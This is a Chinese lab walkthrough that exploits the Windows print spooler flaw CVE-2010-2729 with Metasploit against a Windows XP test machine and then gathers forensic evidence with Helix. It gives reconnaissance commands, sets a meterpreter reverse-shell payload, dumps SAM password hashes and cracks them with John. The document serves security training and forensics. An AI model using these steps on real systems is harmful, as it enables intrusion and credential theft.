# 1、什么是Metasploit
Metasploit Framework是一个开源渗透工具,Metasploit渗透测试框架拥有世界上最大的公共测试漏洞数据库。简单来说,Metasploit可以用来检测安全漏洞,另一方面它也可以用来进行入侵。
# 2、什么是Helix
安全事件响应和取证工具
# 3、什么是打印后台程序服务模拟漏洞 (CVE-2010-2729)
利用MSF中的攻击模块:ms10_061_spoolss
Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。
攻击者可指定任何文件名,包括目录遍历,通过发送 WritePrinter 请求,攻击者可以完全控制创建文件的内容。
将文件写入到Windows系统目录(%SystemRoot%\system32)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。
该漏洞首次被发现并被应用于著名的Stuxnet蠕虫(俗称“震网”)
# 4、实验环境
攻击机:Kali linux 目标机:Windows xp sp2
# 5、实验步骤
# 5.1 使用Nmap扫描目标机器是否存在 NetBios 和 RPC服务
# 5.2 NetBios共享检测
# 5.3 使用MSF的 ms10_061_spoolss 模块攻击目标机
# 5.4 收集基本取证文件
# 5.5 使用Helix远程内存取证
# 5.6 下载基本取证文件
# 6、下载 Helix ,略
# 7、设置目标机环境
# 1、获取目标机ip
# 2、创建共享打印(默认是没有共享打印的)
1)打开控制面板,双击“打印和传真”
2)添加打印机,右键选择 添加打印机
本地打印机,不勾选“自动检测和安装驱动”
选择 使用 LPT1 端口
选一个打印机厂商和型号,我们随便选一个
给打印机取个名字
选择共享这个打印机
不打印测试页
完成设置
# 8、在Kali上检测打印共享
1)nmap 扫描
nmap -sS -sU -O -p137-139,445 192.168.1.149
2)查找 NetBIOS 名称
nmblookup -A 192.168.1.149
NetBIOS工作站名字:WXPSP2
NetBIOS组名:MSHOME
Master Browser:_MSBROWSE_
第二列解释:NetBIOS后缀
00:Workstation Service(workstation name) 类型:Group
03:Windows Messenger service
06:Remote Access Server
20:File Service(also called Host Record)
21:Remote Access Service client
1B:Domain Master Browser-Primary Domain Controller for a domain
1D:Master Browser
第四列:节点类型
B-node:0x01 Broadcast
P-node:0x02 Peer(WINS only)
M-node:0x04 Mixed(broadcast,then WINS)
H-node:0x08 Hybrid(WINS,then broadcast)
# 9、访问SMB资源
smbclient -L \\\WXPSP2 -I 192.168.1.149 -N
看到了打印共享
# 10、使用MSF进行攻击
1)载入模块,查看需要配置的参数
2)配置参数
3)设置payload
set PAYLOAD windows/meterpreter/reverse_tcp
4)设置payload参数
5)攻击
攻击完成后,建立了远程会话
恶意程序被写入到目标机的%SystemRoot%\system32\g9bMJIYNoBtyOS.exe,此程序运行后反弹了一个shell给Kali,从而建立了一个Meterpreter会话。请记录这个程序的名字,后续会用到
而恶意程序是通过%SystemRoot%\system32\wbem\mof\kT044wvLBYxwGk.mof控制运行的
6)接下来我们可以执行一系列操作
6.1)getuid,getpid
可以看到我们获取了系统的system权限,getpid得到的是当前Meterpreter会话的进程ID,记住这个PID
6.2)执行shell,可以直接进入目标机的命令行界面
6.3)查找PID 392关联进程
可以看到正是前面我们写入的那个恶意程序
6.4)查找PID 392 关联的网络链接
# 11、进行基本的信息收集取证
11.1)进程信息收集
tasklist > forensics_tasklist.txt
11.2)网络信息收集
netstat -ano > forensics_netstat.txt
11.3)目录文件信息收集
dir > dir_forensics.txt
11.4)退出shell
# 12 、获取SAM数据库信息
利用hashdump获取SAM数据库
SAM是Windows XP,Windows Vista和Windows 7中存储用户密码的数据库文件
将获取到的信息复制到一个文本文件
# 13 、建立远程取证收集环境
# 14、收集受害者内存信息
1)加载 Helix2008R1 光盘
2)收集信息
选择 Live Acquisition,填写相关信息。
等待内存信息收集完成
取证完成,会自动关闭此cmd窗口
3)查看收集的文件
# 15、下载其他取证文件
下载我们之前收集的进程信息,网络信息和恶意程序
download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/
# 16、使用John 破解密码
成功破解了管理员密码
信息收集完成,后续我们将使用Volatility从抓取的内存进行分析